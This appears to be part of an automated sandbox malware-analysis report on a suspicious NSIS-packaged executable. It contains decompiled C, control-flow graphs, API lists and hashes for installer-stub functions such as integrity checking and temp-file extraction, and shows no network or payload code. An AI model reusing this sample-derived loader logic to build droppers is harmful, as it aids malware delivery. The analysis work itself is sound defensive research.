                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x00000000
                          0x0040667d
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf

                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                          • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                          • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                          • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 629 405d7c-405d90 FindFirstFileA 630 405d92-405d9b FindClose 629->630 631 405d9d 629->631 632 405d9f-405da0 630->632 631->632
                          C-Code - Quality: 100%
                          			E00405D7C(CHAR* _a4) {
                          				void* _t2;
                          
                          				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                          				if(_t2 == 0xffffffff) {
                          					return 0;
                          				}
                          				FindClose(_t2);
                          				return 0x4224e8;
                          			}




                          0x00405d87
                          0x00405d90
                          0x00000000
                          0x00405d9d
                          0x00405d93
                          0x00000000

                          APIs
                          • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 00405D87
                          • FindClose.KERNEL32(00000000), ref: 00405D93
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: $B
                          • API String ID: 2295610775-2366330246
                          • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                          • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                          • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                          • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-403608 GetUserDefaultUILanguage call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 115 40360d 111->115 118 403638-403649 call 40596c 112->118 119 40364e-403654 lstrcatA 112->119 117 403659-403678 call 403897 call 405659 115->117 125 40367e-403683 117->125 126 4036ff-403707 call 405659 117->126 118->119 119->117 125->126 127 403685-4036a9 call 40596c 125->127 132 403715-40373a LoadImageA 126->132 133 403709-403710 call 405aa7 126->133 127->126 134 4036ab-4036ad 127->134 136 403740-403776 RegisterClassA 132->136 137 4037c9-4037d1 call 40140b 132->137 133->132 138 4036be-4036ca lstrlenA 134->138 139 4036af-4036bc call 4055a3 134->139 140 40377c-4037c4 SystemParametersInfoA CreateWindowExA 136->140 141 40388d 136->141 148 4037d3-4037d6 137->148 149 4037db-4037e6 call 403897 137->149 145 4036f2-4036fa call 405578 call 405a85 138->145 146 4036cc-4036da lstrcmpiA 138->146 139->138 140->137 143 40388f-403896 141->143 145->126 146->145 152 4036dc-4036e6 GetFileAttributesA 146->152 148->143 160 403864-40386c call 404ef5 149->160 161 4037e8-403805 ShowWindow LoadLibraryA 149->161 155 4036e8-4036ea 152->155 156 4036ec-4036ed call 4055bf 152->156 155->145 155->156 156->145 169 403886-403888 call 40140b 160->169 170 40386e-403874 160->170 162 403807-40380c LoadLibraryA 161->162 163 40380e-403820 GetClassInfoA 161->163 162->163 165 403822-403832 GetClassInfoA RegisterClassA 163->165 166 403838-403862 DialogBoxParamA call 40140b 163->166 165->166 166->143 169->141 170->148 173 40387a-403881 call 40140b 170->173 173->148
                          C-Code - Quality: 96%
                          			E004035E3() {
                          				intOrPtr _v4;
                          				intOrPtr _v8;
                          				int _v12;
                          				int _v16;
                          				char _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t20;
                          				signed int _t24;
                          				void* _t28;
                          				void* _t30;
                          				int _t31;
                          				void* _t34;
                          				struct HINSTANCE__* _t37;
                          				int _t38;
                          				intOrPtr _t39;
                          				int _t42;
                          				intOrPtr _t59;
                          				char _t61;
                          				CHAR* _t63;
                          				signed char _t67;
                          				signed short _t71;
                          				struct HINSTANCE__* _t75;
                          				CHAR* _t78;
                          				intOrPtr _t80;
                          				CHAR* _t85;
                          
                          				_t80 =  *0x423eb0; // 0x753e70
                          				_t20 = E00405DA3(6);
                          				_t87 = _t20;
                          				if(_t20 == 0) {
                          					_t78 = 0x420498;
                          					"1033" = 0x7830;
                          					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                          					__eflags =  *0x420498;
                          					if(__eflags == 0) {
                          						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                          					}
                          					lstrcatA("1033", _t78);
                          				} else {
                          					_t71 =  *_t20(); // executed
                          					E004059E3("1033", _t71 & 0x0000ffff);
                          				}
                          				E00403897(_t75, _t87);
                          				_t24 =  *0x423eb8; // 0x80
                          				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                          				 *0x423f20 = _t24 & 0x00000020;
                          				if(E00405659(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                          					L16:
                          					if(E00405659(_t95, _t84) == 0) {
                          						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                          					}
                          					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                          					 *0x423688 = _t28;
                          					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                          						L21:
                          						if(E0040140B(0) == 0) {
                          							_t30 = E00403897(_t75, __eflags);
                          							__eflags =  *0x423f40; // 0x0
                          							if(__eflags != 0) {
                          								_t31 = E00404EF5(_t30, 0);
                          								__eflags = _t31;
                          								if(_t31 == 0) {
                          									E0040140B(1);
                          									goto L33;
                          								}
                          								__eflags =  *0x42366c; // 0x0
                          								if(__eflags == 0) {
                          									E0040140B(2);
                          								}
                          								goto L22;
                          							}
                          							ShowWindow( *0x420470, 5);
                          							_t37 = LoadLibraryA("RichEd20");
                          							__eflags = _t37;
                          							if(_t37 == 0) {
                          								LoadLibraryA("RichEd32");
                          							}
                          							_t85 = "RichEdit20A";
                          							_t38 = GetClassInfoA(0, _t85, 0x423640);
                          							__eflags = _t38;
                          							if(_t38 == 0) {
                          								GetClassInfoA(0, "RichEdit", 0x423640);
                          								 *0x423664 = _t85;
                          								RegisterClassA(0x423640);
                          							}
                          							_t39 =  *0x423680; // 0x0
                          							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
                          							E0040140B(5);
                          							return _t42;
                          						}
                          						L22:
                          						_t34 = 2;
                          						return _t34;
                          					} else {
                          						_t75 =  *0x423ea0; // 0x400000
                          						 *0x423654 = _t28;
                          						_v20 = 0x624e5f;
                          						 *0x423644 = E00401000;
                          						 *0x423650 = _t75;
                          						 *0x423664 =  &_v20;
                          						if(RegisterClassA(0x423640) == 0) {
                          							L33:
                          							__eflags = 0;
                          							return 0;
                          						}
                          						_t12 =  &_v16; // 0x624e5f
                          						SystemParametersInfoA(0x30, 0, _t12, 0);
                          						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                          						goto L21;
                          					}
                          				} else {
                          					_t75 =  *(_t80 + 0x48);
                          					if(_t75 == 0) {
                          						goto L16;
                          					}
                          					_t59 =  *0x423ed8; // 0x7583dc
                          					_t78 = 0x422e40;
                          					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
                          					_t61 =  *0x422e40; // 0x78
                          					if(_t61 == 0) {
                          						goto L16;
                          					}
                          					if(_t61 == 0x22) {
                          						_t78 = 0x422e41;
                          						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                          					}
                          					_t63 = lstrlenA(_t78) + _t78 - 4;
                          					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                          						L15:
                          						E00405A85(_t84, E00405578(_t78));
                          						goto L16;
                          					} else {
                          						_t67 = GetFileAttributesA(_t78);
                          						if(_t67 == 0xffffffff) {
                          							L14:
                          							E004055BF(_t78);
                          							goto L15;
                          						}
                          						_t95 = _t67 & 0x00000010;
                          						if((_t67 & 0x00000010) != 0) {
                          							goto L15;
                          						}
                          						goto L14;
                          					}
                          				}
                          			}






























                          0x004035e9
                          0x004035f2
                          0x004035f9
                          0x004035fb
                          0x0040360f
                          0x00403621
                          0x0040362b
                          0x00403630
                          0x00403636
                          0x00403649
                          0x00403649
                          0x00403654
                          0x004035fd
                          0x004035fd
                          0x00403608
                          0x00403608
                          0x00403659
                          0x0040365e
                          0x00403663
                          0x0040366c
                          0x00403678
                          0x004036ff
                          0x00403707
                          0x00403710
                          0x00403710
                          0x00403726
                          0x0040372c
                          0x0040373a
                          0x004037c9
                          0x004037d1
                          0x004037db
                          0x004037e0
                          0x004037e6
                          0x00403865
                          0x0040386a
                          0x0040386c
                          0x00403888
                          0x00000000
                          0x00403888
                          0x0040386e
                          0x00403874
                          0x0040387c
                          0x0040387c
                          0x00000000
                          0x00403874
                          0x004037f0
                          0x00403801
                          0x00403803
                          0x00403805
                          0x0040380c
                          0x0040380c
                          0x00403814
                          0x0040381c
                          0x0040381e
                          0x00403820
                          0x00403829
                          0x0040382c
                          0x00403832
                          0x00403832
                          0x00403838
                          0x00403851
                          0x0040385b
                          0x00000000
                          0x00403860
                          0x004037d3
                          0x004037d5
                          0x00000000
                          0x00403740
                          0x00403740
                          0x00403746
                          0x00403750
                          0x00403758
                          0x00403762
                          0x00403768
                          0x00403776
                          0x0040388d
                          0x0040388d
                          0x00000000
                          0x0040388d
                          0x0040377c
                          0x00403785
                          0x004037c4
                          0x00000000
                          0x004037c4
                          0x0040367e
                          0x0040367e
                          0x00403683
                          0x00000000
                          0x00000000
                          0x00403688
                          0x0040368d
                          0x0040369d
                          0x004036a2
                          0x004036a9
                          0x00000000
                          0x00000000
                          0x004036ad
                          0x004036af
                          0x004036bc
                          0x004036bc
                          0x004036c4
                          0x004036ca
                          0x004036f2
                          0x004036fa
                          0x00000000
                          0x004036dc
                          0x004036dd
                          0x004036e6
                          0x004036ec
                          0x004036ed
                          0x00000000
                          0x004036ed
                          0x004036e8
                          0x004036ea
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004036ea
                          0x004036ca

                          APIs
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                          • GetUserDefaultUILanguage.KERNELBASE(00000006,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004035FD
                            • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                          • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                          • lstrlenA.KERNEL32(xzfdi,?,?,?,xzfdi,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ), ref: 004036BF
                          • lstrcmpiA.KERNEL32(?,.exe,xzfdi,?,?,?,xzfdi,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                          • GetFileAttributesA.KERNEL32(xzfdi), ref: 004036DD
                          • LoadImageA.USER32 ref: 00403726
                          • RegisterClassA.USER32 ref: 0040376D
                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                          • CreateWindowExA.USER32 ref: 004037BE
                          • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                          • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                          • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                          • GetClassInfoA.USER32 ref: 0040381C
                          • GetClassInfoA.USER32 ref: 00403829
                          • RegisterClassA.USER32 ref: 00403832
                          • DialogBoxParamA.USER32 ref: 00403851
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$p>u$xzfdi
                          • API String ID: 2262724009-4051914520
                          • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                          • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                          • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                          • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 176 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 179 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 176->179 180 402cab-402cb0 176->180 188 402dd3-402de1 call 402bc5 179->188 189 402ce9-402d00 179->189 181 402efa-402efe 180->181 196 402eb2-402eb7 188->196 197 402de7-402dea 188->197 191 402d02 189->191 192 402d04-402d0a call 4031a8 189->192 191->192 195 402d0f-402d11 192->195 198 402d17-402d1d 195->198 199 402e6e-402e76 call 402bc5 195->199 196->181 200 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 197->200 201 402dec-402dfd call 4031da call 4031a8 197->201 202 402d9d-402da1 198->202 203 402d1f-402d37 call 40571d 198->203 199->196 227 402e64-402e69 200->227 228 402e78-402ea8 call 4031da call 402f01 200->228 223 402e02-402e04 201->223 211 402da3-402da9 call 402bc5 202->211 212 402daa-402db0 202->212 203->212 221 402d39-402d40 203->221 211->212 214 402db2-402dc0 call 405e0f 212->214 215 402dc3-402dcd 212->215 214->215 215->188 215->189 221->212 226 402d42-402d49 221->226 223->196 224 402e0a-402e10 223->224 224->196 224->200 226->212 229 402d4b-402d52 226->229 227->181 236 402ead-402eb0 228->236 229->212 231 402d54-402d5b 229->231 231->212 233 402d5d-402d7d 231->233 233->196 235 402d83-402d87 233->235 237 402d89-402d8d 235->237 238 402d8f-402d97 235->238 236->196 239 402eb9-402eca 236->239 237->188 237->238 238->212 242 402d99-402d9b 238->242 240 402ed2-402ed7 239->240 241 402ecc 239->241 243 402ed8-402ede 240->243 241->240 242->212 243->243 244 402ee0-402ef8 call 40571d 243->244 244->181
                          C-Code - Quality: 96%
                          			E00402C5B(void* __eflags, signed int _a4) {
                          				long _v8;
                          				long _v12;
                          				intOrPtr _v16;
                          				long _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				signed int _v40;
                          				char _v300;
                          				signed int _t54;
                          				void* _t57;
                          				void* _t62;
                          				signed int _t63;
                          				intOrPtr _t65;
                          				void* _t68;
                          				intOrPtr* _t70;
                          				intOrPtr _t71;
                          				signed int _t77;
                          				signed int _t79;
                          				signed int _t82;
                          				signed int _t83;
                          				signed int _t89;
                          				intOrPtr _t92;
                          				signed int _t101;
                          				signed int _t103;
                          				void* _t105;
                          				signed int _t106;
                          				signed int _t109;
                          				void* _t110;
                          
                          				_v8 = 0;
                          				_v12 = 0;
                          				 *0x423eac = GetTickCount() + 0x3e8;
                          				GetModuleFileNameA(0, "C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe", 0x400);
                          				_t105 = E0040575C("C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe", 0x80000000, 3);
                          				 *0x409010 = _t105;
                          				if(_t105 == 0xffffffff) {
                          					return "Error launching installer";
                          				}
                          				E00405A85("C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy", "C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe");
                          				E00405A85(0x42b000, E004055BF("C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy"));
                          				_t54 = GetFileSize(_t105, 0);
                          				__eflags = _t54;
                          				 *0x41f048 = _t54;
                          				_t109 = _t54;
                          				if(_t54 <= 0) {
                          					L22:
                          					E00402BC5(1);
                          					__eflags =  *0x423eb4; // 0xb600
                          					if(__eflags == 0) {
                          						goto L30;
                          					}
                          					__eflags = _v12;
                          					if(_v12 == 0) {
                          						L26:
                          						_t57 = GlobalAlloc(0x40, _v20); // executed
                          						_t110 = _t57;
                          						E00405E7D(0x40afb0);
                          						E0040578B( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                          						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                          						__eflags = _t62 - 0xffffffff;
                          						 *0x409014 = _t62;
                          						if(_t62 != 0xffffffff) {
                          							_t63 =  *0x423eb4; // 0xb600
                          							_t65 = E004031DA(_t63 + 0x1c);
                          							 *0x41f04c = _t65;
                          							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                          							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                          							__eflags = _t68 - _v20;
                          							if(_t68 == _v20) {
                          								__eflags = _v40 & 0x00000001;
                          								 *0x423eb0 = _t110;
                          								 *0x423eb8 =  *_t110;
                          								if((_v40 & 0x00000001) != 0) {
                          									 *0x423ebc =  *0x423ebc + 1;
                          									__eflags =  *0x423ebc;
                          								}
                          								_t45 = _t110 + 0x44; // 0x44
                          								_t70 = _t45;
                          								_t101 = 8;
                          								do {
                          									_t70 = _t70 - 8;
                          									 *_t70 =  *_t70 + _t110;
                          									_t101 = _t101 - 1;
                          									__eflags = _t101;
                          								} while (_t101 != 0);
                          								_t71 =  *0x41703c; // 0x50207
                          								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                          								E0040571D(0x423ec0, _t110 + 4, 0x40);
                          								__eflags = 0;
                          								return 0;
                          							}
                          							goto L30;
                          						}
                          						return "Error writing temporary file. Make sure your temp folder is valid.";
                          					}
                          					E004031DA( *0x417038);
                          					_t77 = E004031A8( &_a4, 4); // executed
                          					__eflags = _t77;
                          					if(_t77 == 0) {
                          						goto L30;
                          					}
                          					__eflags = _v8 - _a4;
                          					if(_v8 != _a4) {
                          						goto L30;
                          					}
                          					goto L26;
                          				} else {
                          					do {
                          						_t79 =  *0x423eb4; // 0xb600
                          						_t106 = _t109;
                          						asm("sbb eax, eax");
                          						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
                          						__eflags = _t109 - _t82;
                          						if(_t109 >= _t82) {
                          							_t106 = _t82;
                          						}
                          						_t83 = E004031A8(0x417048, _t106); // executed
                          						__eflags = _t83;
                          						if(_t83 == 0) {
                          							E00402BC5(1);
                          							L30:
                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                          						}
                          						__eflags =  *0x423eb4; // 0xb600
                          						if(__eflags != 0) {
                          							__eflags = _a4 & 0x00000002;
                          							if((_a4 & 0x00000002) == 0) {
                          								E00402BC5(0);
                          							}
                          							goto L19;
                          						}
                          						E0040571D( &_v40, 0x417048, 0x1c);
                          						_t89 = _v40;
                          						__eflags = _t89 & 0xfffffff0;
                          						if((_t89 & 0xfffffff0) != 0) {
                          							goto L19;
                          						}
                          						__eflags = _v36 - 0xdeadbeef;
                          						if(_v36 != 0xdeadbeef) {
                          							goto L19;
                          						}
                          						__eflags = _v24 - 0x74736e49;
                          						if(_v24 != 0x74736e49) {
                          							goto L19;
                          						}
                          						__eflags = _v28 - 0x74666f73;
                          						if(_v28 != 0x74666f73) {
                          							goto L19;
                          						}
                          						__eflags = _v32 - 0x6c6c754e;
                          						if(_v32 != 0x6c6c754e) {
                          							goto L19;
                          						}
                          						_a4 = _a4 | _t89;
                          						_t103 =  *0x417038; // 0x0
                          						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                          						_t92 = _v16;
                          						__eflags = _t92 - _t109;
                          						 *0x423eb4 = _t103;
                          						if(_t92 > _t109) {
                          							goto L30;
                          						}
                          						__eflags = _a4 & 0x00000008;
                          						if((_a4 & 0x00000008) != 0) {
                          							L15:
                          							_v12 = _v12 + 1;
                          							_t109 = _t92 - 4;
                          							__eflags = _t106 - _t109;
                          							if(_t106 > _t109) {
                          								_t106 = _t109;
                          							}
                          							goto L19;
                          						}
                          						__eflags = _a4 & 0x00000004;
                          						if((_a4 & 0x00000004) != 0) {
                          							goto L22;
                          						}
                          						goto L15;
                          						L19:
                          						__eflags = _t109 -  *0x41f048; // 0x32d2
                          						if(__eflags < 0) {
                          							_v8 = E00405E0F(_v8, 0x417048, _t106);
                          						}
                          						 *0x417038 =  *0x417038 + _t106;
                          						_t109 = _t109 - _t106;
                          						__eflags = _t109;
                          					} while (_t109 > 0);
                          					goto L22;
                          				}
                          			}

































                          0x00402c69
                          0x00402c6c
                          0x00402c86
                          0x00402c8b
                          0x00402c9e
                          0x00402ca3
                          0x00402ca9
                          0x00000000
                          0x00402cab
                          0x00402cbc
                          0x00402ccd
                          0x00402cd4
                          0x00402cda
                          0x00402cdc
                          0x00402ce1
                          0x00402ce3
                          0x00402dd3
                          0x00402dd5
                          0x00402dda
                          0x00402de1
                          0x00000000
                          0x00000000
                          0x00402de7
                          0x00402dea
                          0x00402e16
                          0x00402e1b
                          0x00402e26
                          0x00402e28
                          0x00402e39
                          0x00402e54
                          0x00402e5a
                          0x00402e5d
                          0x00402e62
                          0x00402e78
                          0x00402e81
                          0x00402e91
                          0x00402ea3
                          0x00402ea8
                          0x00402ead
                          0x00402eb0
                          0x00402eb9
                          0x00402ebd
                          0x00402ec5
                          0x00402eca
                          0x00402ecc
                          0x00402ecc
                          0x00402ecc
                          0x00402ed4
                          0x00402ed4
                          0x00402ed7
                          0x00402ed8
                          0x00402ed8
                          0x00402edb
                          0x00402edd
                          0x00402edd
                          0x00402edd
                          0x00402ee0
                          0x00402ee7
                          0x00402ef3
                          0x00402ef8
                          0x00000000
                          0x00402ef8
                          0x00000000
                          0x00402eb0
                          0x00000000
                          0x00402e64
                          0x00402df2
                          0x00402dfd
                          0x00402e02
                          0x00402e04
                          0x00000000
                          0x00000000
                          0x00402e0d
                          0x00402e10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402ce9
                          0x00402ce9
                          0x00402ce9
                          0x00402cee
                          0x00402cf2
                          0x00402cf9
                          0x00402cfe
                          0x00402d00
                          0x00402d02
                          0x00402d02
                          0x00402d0a
                          0x00402d0f
                          0x00402d11
                          0x00402e70
                          0x00402eb2
                          0x00000000
                          0x00402eb2
                          0x00402d17
                          0x00402d1d
                          0x00402d9d
                          0x00402da1
                          0x00402da4
                          0x00402da9
                          0x00000000
                          0x00402da1
                          0x00402d2a
                          0x00402d2f
                          0x00402d32
                          0x00402d37
                          0x00000000
                          0x00000000
                          0x00402d39
                          0x00402d40
                          0x00000000
                          0x00000000
                          0x00402d42
                          0x00402d49
                          0x00000000
                          0x00000000
                          0x00402d4b
                          0x00402d52
                          0x00000000
                          0x00000000
                          0x00402d54
                          0x00402d5b
                          0x00000000
                          0x00000000
                          0x00402d5d
                          0x00402d63
                          0x00402d6c
                          0x00402d72
                          0x00402d75
                          0x00402d77
                          0x00402d7d
                          0x00000000
                          0x00000000
                          0x00402d83
                          0x00402d87
                          0x00402d8f
                          0x00402d8f
                          0x00402d92
                          0x00402d95
                          0x00402d97
                          0x00402d99
                          0x00402d99
                          0x00000000
                          0x00402d97
                          0x00402d89
                          0x00402d8d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402daa
                          0x00402daa
                          0x00402db0
                          0x00402dc0
                          0x00402dc0
                          0x00402dc3
                          0x00402dc9
                          0x00402dcb
                          0x00402dcb
                          0x00000000
                          0x00402ce9

                          APIs
                          • GetTickCount.KERNEL32 ref: 00402C6F
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,00000400), ref: 00402C8B
                            • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 00405760
                            • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 00402CD4
                          • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                          Strings
                          • Null, xrefs: 00402D54
                          • soft, xrefs: 00402D4B
                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
